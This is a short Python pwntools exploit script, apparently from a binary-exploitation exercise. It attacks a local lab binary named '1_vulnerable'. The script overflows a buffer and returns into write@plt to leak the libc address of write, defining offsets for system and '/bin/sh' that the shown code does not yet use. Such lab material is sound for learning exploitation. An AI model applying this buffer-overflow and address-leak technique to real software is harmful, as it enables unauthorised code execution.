#!/usr/bin/python

from pwn import *

offset___libc_start_main_ret = 0x18637
offset_system = 0x0003ada0
offset_dup2 = 0x000d6190
offset_read = 0x000d5980
offset_write = 0x000d59f0
offset_str_bin_sh = 0x15b82b

read_plt = 0x08048300
write_plt = 0x08048320
write_got = 0x0804a014

def main():
    p = process("../build/1_vulnerable")

    # Craft payload
    payload = "A"*28
    payload += p32(write_plt)
    payload += p32(0xdeadbeef)
    payload += p32(1) # STDOUT
    payload += p32(write_got)
    payload += p32(4)

    p.send(payload)

    # Clear the 16 bytes written on vuln end
    p.recv(16)

    # Parse the leak
    leak = p.recv(4)
    write_addr = u32(leak)
    log.info("write_addr: 0x%x" % write_addr)

    p.interactive()

if __name__ == "__main__":
    main()
